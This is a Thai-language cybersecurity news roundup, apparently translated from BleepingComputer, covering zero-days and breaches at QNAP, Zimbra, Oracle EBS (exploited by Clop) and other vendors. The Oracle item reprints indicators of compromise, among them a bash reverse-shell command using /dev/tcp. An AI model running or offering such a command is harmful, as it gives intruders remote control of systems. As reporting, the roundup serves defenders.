Logitech ออกมายอมรับเหตุการณ์ข้อมูลรั่วไหล หลังถูกกลุ่ม Clop โจมตีเพื่อเรียกค่าไถ่

Logitech บริษัทยักษ์ใหญ่ด้านอุปกรณ์เสริม hardware ได้ออกมายืนยันว่าบริษัทประสบเหตุการณ์ข้อมูลรั่วไหลในเหตุการณ์การโจมตีทางไซเบอร์ ซึ่งกลุ่ม Clop อ้างว่าเป็นผู้ก่อเหตุ โดยกลุ่มดังกล่าวเคยก่อเหตุขโมยข้อมูลจาก Oracle E-Business Suite เมื่อเดือนกรกฎาคมที่ผ่านมา (more…)

QNAP แก้ไขช่องโหว่ zero-day 7 รายการบน NAS ที่ถูกใช้โจมตีในงาน Pwn2Own

QNAP ได้แก้ไขช่องโหว่ zero-day จำนวน 7 รายการ ที่นักวิจัยด้านความปลอดภัยใช้โจมตีในการแฮ็กอุปกรณ์ NAS (network-attached storage) ของ QNAP ในระหว่างการแข่งขัน Pwn2Own Ireland 2025

ช่องโหว่เหล่านี้ส่งผลกระทบต่อระบบปฏิบัติการ QTS และ QuTS hero ของ QNAP (CVE-2025-62847, CVE-2025-62848, CVE-2025-62849) และซอฟต์แวร์ของบริษัท ได้แก่ Hyper Data Protector (CVE-2025-59389), Malware Remover (CVE-2025-11837) และ HBS 3 Hybrid Backup Sync (CVE-2025-62840, CVE-2025-62842)

QNAP ได้ระบุในคำแนะนำที่เผยแพร่เมื่อวันศุกร์ที่ผ่านมา โดยระบุว่า ช่องโหว่ด้านความปลอดภัยเหล่านี้ถูกใช้โจมตีในงาน Pwn2Own โดยทีม Summoning Team, DEVCORE, Team DDOS และนักศึกษาฝึกงานจาก CyCraft technology

เพื่อแก้ไขช่องโหว่ด้านความปลอดภัยเหล่านี้ QNAP แนะนำให้อัปเดตซอฟต์แวร์ให้เป็นเวอร์ชันล่าสุด และเปลี่ยนรหัสผ่านทั้งหมดเพื่อเพิ่มความปลอดภัย

QNAP ได้แก้ไขช่องโหว่ทั้งหมดแล้วในซอฟต์แวร์เวอร์ชันดังต่อไปนี้ :

Hyper Data Protector 2.2.4.1 และเวอร์ชันที่ใหม่กว่า
Malware Remover 6.6.8.20251023 และเวอร์ชันที่ใหม่กว่า
HBS 3 Hybrid Backup Sync 26.2.0.938 และเวอร์ชันที่ใหม่กว่า
QTS 5.2.7.3297 build 20251024 และเวอร์ชันที่ใหม่กว่า
QuTS hero h5.2.7.3297 build 20251024 และเวอร์ชันที่ใหม่กว่า
QuTS hero h5.3.1.3292 build 20251024 และเวอร์ชันที่ใหม่กว่า

สำหรับผู้ใช้ที่ต้องการอัปเดต OS ให้ล็อกอินเข้าสู่ QTS หรือ QuTS Hero ในฐานะผู้ดูแลระบบ จากนั้นไปที่ Control Panel > System > Firmware Update และคลิก "Check for Update" ตรงหัวข้อ Live Update

หากต้องการอัปเดตแอปที่มีช่องโหว่ ให้ล็อกอินเข้าสู่ QTS หรือ QuTS hero ในฐานะผู้ดูแลระบบก่อน จากนั้นเปิด App Center แล้วคลิกปุ่มค้นหา พิมพ์ชื่อแอปที่คุณต้องการอัปเดตแล้วกด ENTER ในผลการค้นหา ให้คลิก "Update" จากนั้นยืนยันการดำเนินการโดยคลิก "OK" ในข้อความยืนยันที่ปรากฏขึ้น

QNAP ระบุว่า "เพื่อรักษาความปลอดภัยให้กับอุปกรณ์ ขอแนะนำให้อัปเดตระบบเป็นเวอร์ชันล่าสุดอย่างสม่ำเสมอ เพื่อเป็นการแก้ไขช่องโหว่ สามารถตรวจสอบสถานะการ support ผลิตภัณฑ์ เพื่อดูการอัปเดตล่าสุดที่มีให้สำหรับ NAS รุ่นที่กำลังใช้งานอยู่"

เมื่อหนึ่งปีที่แล้ว ผู้ผลิต NAS (QNAP) ได้แก้ไขช่องโหว่ zero-day อีกสองรายการที่ถูกใช้โจมตีในระหว่างการแข่งขัน Pwn2Own Ireland 2024 ได้แก่ ช่องโหว่ OS command injection (CVE-2024-50388) ในโซลูชันการสำรองข้อมูล และกู้คืนระบบ Hybrid Backup Sync และช่องโหว่ SQL injection (SQLi) (CVE-2024-50387) ในบริการ SMB Service ของ QNAP

ในวันที่ 7 พฤศจิกายน 2025 QNAP ยังได้ปล่อยอัปเดต QuMagie 2.7.0 พร้อมการแก้ไขช่องโหว่ SQLi ที่มีความรุนแรงระดับ Critical (CVE-2025-52425) ในโซลูชันการจัดการ และการแชร์รูปภาพ ซึ่งช่องโหว่ดังกล่าวสามารถทำให้ผู้โจมตีจากภายนอกเรียกใช้โค้ด หรือคำสั่งที่ไม่ได้รับอนุญาตบนอุปกรณ์ที่มีช่องโหว่ได้

 

ที่มา : bleepingcomputer.

LandFall Spyware ตัวใหม่ ใช้การโจมตีจากช่องโหว่ Zero-day ของ Samsung ผ่านข้อความใน WhatsApp

ผู้ไม่หวังดีกำลังโจมตีโดยใช้ช่องโหว่ zero-day ในไลบรารีการประมวลผลรูปภาพบนระบบ Android ของ Samsung เพื่อแพร่กระจาย Spyware ที่ยังไม่เคยถูกพบมาก่อนชื่อ 'LandFall' โดยใช้รูปภาพอันตรายที่ส่งผ่านทาง WhatsApp

ช่องโหว่ด้านความปลอดภัยดังกล่าวได้รับการแก้ไขแล้วในเดือนเมษายนที่ผ่านมา แต่นักวิจัยพบหลักฐานว่าผู้ไม่หวังดีได้เริ่มใช้ LandFall มาตั้งแต่เดือนกรกฎาคม 2024 เป็นอย่างน้อย และมุ่งเป้าไปที่ผู้ใช้ Samsung Galaxy บางรายในแถบตะวันออกกลาง

ช่องโหว่ zero-day ดังกล่าวมีหมายเลข CVE-2025-21042 ซึ่งเป็นช่องโหว่ประเภท "out-of-bounds write" ในไลบรารี libimagecodec.

CISA แจ้งเตือนช่องโหว่ระดับ Critical ใน CentOS Web Panel ที่กำลังถูกใช้ในการโจมตี

สำนักงานความมั่นคงทางไซเบอร์ และโครงสร้างพื้นฐาน (CISA) ของสหรัฐฯ แจ้งเตือนการพบผู้โจมตีกำลังใช้ประโยชน์จากช่องโหว่ในการเรียกใช้คำสั่งที่เป็นอันตรายจากระยะไกลใน CentOS Web Panel (CWP) (more…)

แฮ็กเกอร์ที่มีความเชื่อมโยงกับจีนกำลังใช้ช่องโหว่ zero-day ของ Lanscope ในการโจมตี

กลุ่มผู้โจมตีทางไซเบอร์ที่มีความเชื่อมโยงกับจีน ที่ถูกติดตามภายใต้ชื่อ 'Bronze Butler' (Tick) ได้โจมตีโดยใช้ช่องโหว่ zero-day ของ Motex Lanscope Endpoint Manager เพื่อติดตั้งมัลแวร์ Gokcpdoor เวอร์ชันอัปเดตของพวกเขา

(more…)

Hackers ใช้ช่องโหว่ Zero-day โจมตีซอฟต์แวร์ file sharing ของ Gladinet

ผู้ไม่หวังดีกำลังโจมตีโดยใช้ช่องโหว่ Zero-day (CVE-2025-11371) ในผลิตภัณฑ์ Gladinet CentreStack และ Triofox ซึ่งอาจทำให้ผู้โจมตีสามารถเข้าถึง system files บนเครื่องได้โดยไม่ต้องผ่านการยืนยันตัวตน

จนถึงขณะนี้ มีบริษัทตกเป็นเป้าหมายแล้วอย่างน้อย 3 ราย แม้ว่าจะยังไม่มีแพตช์สำหรับการแก้ไขออกมา แต่ผู้ใช้งานสามารถใช้วิธีการลดความเสี่ยงชั่วคราวไปก่อนได้ (more…)

Microsoft จำกัดการเข้าถึง IE mode ใน Edge หลังเกิดการโจมตีแบบ Zero-day

Microsoft กำลังจำกัดการเข้าถึง Internet Explorer mode ในเบราว์เซอร์ Edge หลังจากได้รับข้อมูลว่ามีแฮ็กเกอร์กำลังโจมตีผ่านช่องโหว่แบบ Zero-day ใน Chakra JavaScript engine เพื่อเข้าถึงอุปกรณ์ของเป้าหมาย

Microsoft ไม่ได้เปิดเผยรายละเอียดทางเทคนิค แต่ระบุว่าผู้โจมตีได้ใช้เทคนิค social engineering ร่วมกับช่องโหว่ใน Chakra เพื่อให้สามารถเรียกใช้โค้ดที่เป็นอันตรายจากระยะไกล (RCE) ได้ (more…)

Hackers โจมตีช่องโหว่ Zero-day ใน Zimbra ผ่านไฟล์ iCalendar

นักวิจัยที่เฝ้าติดตาม .ICS calendar attachments ที่มีขนาดใหญ่ พบว่ามีการใช้ช่องโหว่ Zero-day ใน Zimbra Collaboration Suite (ZCS) เพื่อโจมตีมาตั้งแต่ช่วงต้นปีที่ผ่านมา

ไฟล์ ICS หรือ iCalendar เป็นไฟล์ที่ใช้สำหรับจัดเก็บข้อมูลปฏิทิน และตารางการนัดหมาย (เช่น การประชุม, อีเวนต์ และงานต่าง ๆ) ในรูปแบบ plain text และใช้เพื่อแลกเปลี่ยนข้อมูลดังกล่าวระหว่างแอปพลิเคชันปฏิทินต่าง ๆ

ผู้โจมตีได้ใช้ประโยชน์จากช่องโหว่หมายเลข CVE-2025-27915 ซึ่งเป็นช่องโหว่ประเภท Cross-Site Scripting (XSS) ที่พบใน ZCS เวอร์ชัน 9.0, 10.0 และ 10.1 เพื่อส่ง JavaScript payload ไปยังระบบของเป้าหมาย

ช่องโหว่ดังกล่าวเกิดจากการ sanitization เนื้อหา HTML ในไฟล์ ICS ที่ไม่เพียงพอ ทำให้ผู้โจมตีสามารถเรียกใช้โค้ด JavaScript ใด ๆ ก็ได้ภายใน session ของเหยื่อได้ เช่น การตั้งค่า filters อีเมลให้เปลี่ยนเส้นทางข้อความไปหาผู้โจมตี

ทาง Zimbra ได้แก้ไขช่องโหว่ด้านความปลอดภัยนี้เมื่อวันที่ 27 มกราคม ที่ผ่านมา โดยการออก ZCS เวอร์ชัน 9.0.0 P44, 10.0.13 และ 10.1.5 แต่ในขณะนั้นไม่ได้กล่าวถึงการโจมตีใด ๆ ที่เกิดขึ้นจริง

อย่างไรก็ตาม นักวิจัยจาก StrikeReady ซึ่งเป็นบริษัทผู้พัฒนาแพลตฟอร์มการจัดการภัยคุกคาม และการดำเนินงานด้านความปลอดภัยที่ขับเคลื่อนด้วย AI ได้ค้นพบการโจมตีดังกล่าว หลังจากที่คอยจับตาดูไฟล์ .ICS ที่มีขนาดใหญ่กว่า 10KB และมีโค้ด JavaScript แฝงอยู่ภายใน

ทีมวิจัยสรุปได้ว่า การโจมตีได้เริ่มต้นขึ้นตั้งแต่ช่วงต้นเดือนมกราคมที่ผ่านมา ก่อนที่ทาง Zimbra จะปล่อยแพตช์ออกมาแก้ไขเสียอีก

ผู้โจมตีได้ปลอมตัวเป็น “สำนักงานพิธีการของกองทัพเรือลิเบีย (Libyan Navy’s Office of Protocol)” และได้ส่งอีเมลที่มีมัลแวร์เพื่อโจมตีแบบ zero-day ไปยังองค์กรทางการทหารแห่งหนึ่งของบราซิล

อีเมลอันตรายดังกล่าวแนบไฟล์ ICS ที่มีขนาด 600KB ซึ่งภายในมีไฟล์ JavaScript ที่ถูกซ่อนโค้ดอันตรายด้วยวิธีการเข้ารหัสแบบ Base64

จากการวิเคราะห์ของทีมวิจัย พบว่า payload ถูกออกแบบมาเพื่อขโมยข้อมูลจาก Zimbra Webmail โดยเฉพาะ เช่น ข้อมูล credentials, อีเมล, รายชื่อผู้ติดต่อ และโฟลเดอร์ที่แชร์ร่วมกัน

StrikeReady ระบุว่า โค้ดอันตรายดังกล่าวถูกเขียนให้ทำงานใน asynchronous mode และทำงานผ่านฟังก์ชันที่เรียกว่า Immediately Invoked Function Expressions (IIFEs) ในรูปแบบต่าง ๆ โดยทีมวิจัยพบว่ามันสามารถทำงานได้ดังต่อไปนี้ :

สร้าง fields username/password แบบ hidden
ขโมยข้อมูล credentials จากการล็อกอิน
เฝ้าดูพฤติกรรมการใช้งานของผู้ใช้ (เมาส์ และคีย์บอร์ด) และบังคับออกจากระบบเมื่อไม่มีการใช้งาน เพื่อดักขโมยข้อมูลในการล็อกอินครั้งถัดไป
ใช้ Zimbra SOAP API เพื่อค้นหาโฟลเดอร์ และดึงข้อมูลอีเมล
ส่งเนื้อหาอีเมลไปยังผู้โจมตี (ทำซ้ำทุก ๆ 4 ชั่วโมง)
เพิ่ม filter ชื่อ "Correo" เพื่อส่งต่ออีเมลไปยังอีเมลแอดเดรสของ Proton
รวบรวมข้อมูลการ authentication/backup และแอบส่งออกไป
แอบส่งออกข้อมูลรายชื่อผู้ติดต่อ, รายชื่อกลุ่มผู้รับอีเมล และ shared folders
ตั้งค่าให้หน่วงเวลาก่อนเริ่มทำงาน 60 วินาที
บังคับให้มีการเว้นระยะการทำงาน 3 วัน (จะทำงานอีกครั้งก็ต่อเมื่อผ่านไปแล้วอย่างน้อย 3 วันจากการทำงานครั้งล่าสุด)
ซ่อน user interface (UI) เพื่อไม่ให้ผู้ใช้สังเกตเห็นความผิดปกติ

StrikeReady ยังไม่สามารถระบุแหล่งที่มาของการโจมตีครั้งนี้ได้อย่างแน่ชัดว่าเป็นฝีมือของกลุ่มผู้ไม่หวังดีกลุ่มใด แต่ตั้งข้อสังเกตว่ามีผู้โจมตีเพียงไม่กี่กลุ่มที่มีความสามารถในการค้นพบช่องโหว่ Zero-day ในผลิตภัณฑ์ที่ใช้กันอย่างแพร่หลายได้ พร้อมระบุเพิ่มเติมว่า “กลุ่มที่มีความเชื่อมโยงกับรัสเซียมีความช่ำชองในเรื่องนี้เป็นพิเศษ”

ทีมวิจัยยังระบุว่า กลยุทธ์, เทคนิค และขั้นตอน (TTPs) ที่คล้ายคลึงกันนี้ เคยถูกพบในการโจมตีที่เชื่อว่าเป็นฝีมือของกลุ่ม UNC1151 ซึ่งเป็นกลุ่มผู้ไม่หวังดีที่ Mandiant ระบุว่ามีความเชื่อมโยงกับรัฐบาลเบลารุส

ในรายงานของ StrikeReady ได้มีการเปิดเผยข้อมูล Indicators of Compromise และโค้ด JavaScript เวอร์ชันที่มีการ decode แล้ว ซึ่งเป็นโค้ดที่ใช้ในการโจมตีผ่านไฟล์ calendar .ICS ครั้งนี้

Update วันที่ 6 ตุลาคม 2025 : Zimbra ให้ข้อมูลกับ BleepingComputer โดยระบุว่า จากข้อมูลของทางบริษัท การใช้ช่องโหว่ดังกล่าวในการโจมตียังไม่ปรากฏว่ามีการโจมตีอย่างแพร่หลาย

นอกจากนี้ ทาง Zimbra ยังแนะนำให้ผู้ใช้ปฏิบัติตามขั้นตอนด้านความปลอดภัยดังต่อไปนี้ :

ตรวจสอบ filters อีเมลที่มีอยู่ทั้งหมดว่ามีการเปลี่ยนแปลงโดยไม่ได้รับอนุญาตหรือไม่
ตรวจสอบให้แน่ใจว่าโปรแกรม Zimbra ที่ติดตั้งไว้ ได้รับการอัปเดตเป็นแพตช์ล่าสุดแล้วหรือยัง
ตรวจสอบ message store ว่ามีรายการ .ICS ที่ถูก encode แบบ Base64 หรือไม่ และคอยเฝ้าดู traffic บนเครือข่ายเพื่อหาการเชื่อมต่อที่ผิดปกติ หรือน่าสงสัย

 

ที่มา : bleepingcomputer.

Oracle ออกแพตช์แก้ไขช่องโหว่ Zero-day ในระบบ EBS ที่ถูกกลุ่ม Clop ใช้โจมตีเพื่อขโมยข้อมูล

Oracle ออกคำเตือนเกี่ยวกับช่องโหว่ Zero-day ระดับ critical ในระบบ E-Business Suite ซึ่งมีหมายเลข CVE-2025-61882 โดยช่องโหว่นี้ทำให้ผู้โจมตีสามารถรันโค้ดที่เป็นอันตรายจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน และช่องโหว่นี้กำลังถูกนำไปใช้จริงในการโจมตีเพื่อขโมยข้อมูลจากกลุ่ม Clop

ช่องโหว่นี้อยู่ในผลิตภัณฑ์ Oracle Concurrent Processing ของ Oracle E-Business Suite (component: BI Publisher Integration) และมีคะแนน CVSS 9.8 เนื่องจากไม่ต้องผ่านการยืนยันตัวตน และสามารถถูกโจมตีได้ง่าย

ตามที่ Oracle ระบุไว้ในเอกสารคำแนะนำฉบับใหม่ว่า “การแจ้งเตือนด้านความปลอดภัยฉบับนี้มีขึ้นเพื่อจัดการกับช่องโหว่ CVE-2025-61882 ในระบบ Oracle E-Business Suite”

ช่องโหว่นี้สามารถถูกโจมตีจากระยะไกลได้โดยไม่ต้องผ่านการยืนยันตัวตน โดยผู้โจมตีสามารถใช้ประโยชน์จากช่องโหว่นี้ผ่านเครือข่ายได้ โดยไม่จำเป็นต้องมีชื่อผู้ใช้ หรือรหัสผ่าน และหากการโจมตีสำเร็จ อาจส่งผลให้เกิดการรันโค้ดที่เป็นอันตรายจากระยะไกลได้

Oracle ยืนยันว่า ช่องโหว่แบบ zero-day ดังกล่าว ส่งผลกระทบต่อระบบ Oracle E-Business Suite เวอร์ชัน 12.2.3 ถึง 12.2.14 และได้ออกแพตซ์อัปเดตฉุกเฉิน (emergency update) เพื่อแก้ไขช่องโหว่นี้แล้ว

บริษัทระบุว่า ลูกค้าจะต้องติดตั้ง Critical Patch Update ประจำเดือนตุลาคม 2023 ก่อน จึงจะสามารถติดตั้งแพตซ์อัปเดตความปลอดภัยชุดใหม่ได้

เนื่องจากมีการเปิดเผย PoC exploit ออกมาแล้ว และช่องโหว่นี้กำลังถูกใช้ในการโจมตีจริง จึงจำเป็นที่ผู้ดูแลระบบ Oracle จะต้องติดตั้งอัปเดตความปลอดภัยโดยเร็วที่สุด

ช่องโหว่ zero-day ดังกล่าวถูกนำไปใช้ในการโจมตีเพื่อขโมยข้อมูลโดยกลุ่ม Clop

แม้ว่า Oracle จะไม่ได้ระบุอย่างชัดเจนว่าช่องโหว่นี้เป็น zero-day แต่บริษัทได้เปิดเผย Indicators of Compromise (IoCs) ซึ่งสอดคล้องกับโค้ดการโจมตีใน Oracle EBS ที่กลุ่มผู้โจมตีแชร์กันเมื่อไม่นานมานี้บน Telegram

Charles Carmakal ประธานเจ้าหน้าที่ฝ่ายเทคนิค (CTO) ของ Mandiant – Google Cloud ยืนยันว่าช่องโหว่ CVE-2025-61882 และช่องโหว่อื่น ๆ ที่ Oracle แก้ไขไปเมื่อเดือนกรกฎาคมนั้น ถูกกลุ่มแรนซัมแวร์ Clop นำไปใช้โจมตี และขโมยข้อมูลจากเซิร์ฟเวอร์ Oracle E-Business Suite ในเหตุการณ์การขโมยข้อมูลเมื่อเดือนสิงหาคม 2025

Carmakal ระบุผ่าน LinkedIn ว่า “กลุ่ม Clop ได้ใช้ช่องโหว่หลายรายการใน Oracle EBS เพื่อขโมยข้อมูลจำนวนมากจากเหยื่อหลายรายในเดือนสิงหาคม 2025”

Carmakal ระบุเพิ่มเติมว่า มีการใช้ช่องโหว่หลายรายการในการโจมตี รวมถึงช่องโหว่ที่ถูกแพตช์ไปแล้วในการอัปเดตของ Oracle เมื่อเดือนกรกฎาคม 2025 และช่องโหว่ที่เพิ่งถูกแก้ไขไปเมื่อสุดสัปดาห์ที่ผ่านมา (CVE-2025-61882)

ข่าวเกี่ยวกับแคมเปญการโจมตีครั้งล่าสุดของกลุ่ม Clop ถูกเผยแพร่ครั้งแรกเมื่อสัปดาห์ที่แล้ว เมื่อทีม Mandiant และ Google Threat Intelligence Group (GTIG) รายงานว่ากำลังติดตามแคมเปญใหม่ที่มีหลายบริษัทได้รับอีเมลซึ่งอ้างว่ามาจากกลุ่มผู้โจมตี

อีเมลเหล่านั้นระบุว่ากลุ่ม Clop ได้ขโมยข้อมูลจากระบบ Oracle E-Business Suite ของบริษัท และกำลังเรียกค่าไถ่เพื่อไม่ให้ข้อมูลที่ขโมยไปถูกนำออกไปเผยแพร่สู่สาธารณะ

เนื้อหาในอีเมลที่ถูกเรียกค่าไถ่ที่มีการแชร์ให้กับ BleepingComputer ระบุว่า "พวกเรา CL0P team หากคุณยังไม่เคยได้ยินข้อมูลเกี่ยวกับเรา คุณสามารถค้นหาข้อมูลเกี่ยวกับเราได้ทาง Google บนอินเทอร์เน็ต"

“เราเพิ่งโจมตีไปที่ระบบ Oracle E-Business Suite ของคุณได้สำเร็จ และได้ Copy เอกสารจำนวนมากออกมา ตอนนี้ไฟล์ส่วนตัวทั้งหมด และข้อมูลอื่น ๆ ของคุณถูกเก็บอยู่ในระบบของเราแล้ว”

กลุ่ม Clop มีประวัติยาวนานในการใช้ประโยชน์จากช่องโหว่แบบ zero-day ทำการโจมตีเพื่อขโมยข้อมูลครั้งใหญ่หลายครั้งในช่วงหลายปีที่ผ่านมา อาทิเช่น

ปี 2020: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม Accellion FTA ส่งผลกระทบกับบริษัทเกือบ 100 องค์กร
ปี 2021: ใช้ช่องโหว่แบบ zero-day ในซอฟต์แวร์ SolarWinds Serv-U FTP
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในแพลตฟอร์ม GoAnywhere MFT โจมตีบริษัทมากกว่า 100 องค์กร
ปี 2023: ใช้ช่องโหว่แบบ zero-day ในระบบ MOVEit Transfer ซึ่งถือเป็นแคมเปญที่ใหญ่ที่สุดของกลุ่ม Clop จนถึงปัจจุบัน ทำให้สามารถขโมยข้อมูลจาก 2,773 องค์กรทั่วโลก
ปี 2024: ใช้ช่องโหว่ zero-day จำนวนสองรายการในระบบ Cleo file transfer (CVE-2024-50623 และ CVE-2024-55956) เพื่อขโมยข้อมูล และเรียกค่าไถจากบริษัทต่าง ๆ

ในเวลาต่อมากลุ่ม Clop ได้ยืนยันกับ BleepingComputer ว่า พวกเขาอยู่เบื้องหลังอีเมลเรียกค่าไถ่ และระบุว่าพวกเขาใช้ประโยชน์จากช่องโหว่ Oracle zero-day เพื่อขโมยข้อมูล

อย่างไรก็ตาม ในช่วงแรก Oracle ได้เชื่อมโยงแคมเปญการเรียกค่าไถ่ของกลุ่ม Clop เข้ากับช่องโหว่ที่ถูกแพตช์ไปแล้วในเดือนกรกฎาคม 2025 แทนที่จะเป็นช่องโหว่ zero-day ตัวใหม่ ที่ภายหลังถูกยืนยันว่าเป็นช่องโหว่ที่ใช้ในการโจมตีครั้งนี้

Oracle ได้เปิดเผย IoCs สำหรับการโจมตีจากช่องโหว่ zero-day ซึ่งมี 2 IP addresses ที่พบว่าถูกใช้ในการโจมตีเซิร์ฟเวอร์ และคำสั่งที่ใช้เปิด remote shell รวมไปถึง exploit archive และไฟล์ที่เกี่ยวข้องในการโจมตี ดังนี้

200[.]107[.]207[.]26 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
185[.]181[.]60[.]11 - IP address ที่เชื่อมโยงกับการโจมตี (HTTP GET และ POST requests)
sh -c /bin/bash -i >& /dev/tcp// 0>&1 - คำสั่งที่เรียกใช้งาน reverse shell
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d - oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.

Apple Backport แก้ไขช่องโหว่ Zero-Day ในอุปกรณ์ iPhone และ iPad รุ่นเก่า

Apple เผยแพร่การอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ Zero-Day ที่ถูกเปิดเผยในเดือนสิงหาคม 2025 ไปยัง iPhone และ iPad รุ่นเก่า เนื่องจากพบว่าช่องโหว่ดังกล่าวได้ถูกนำไปใช้ในการโจมตีที่มีความซับซ้อนสูง (more…)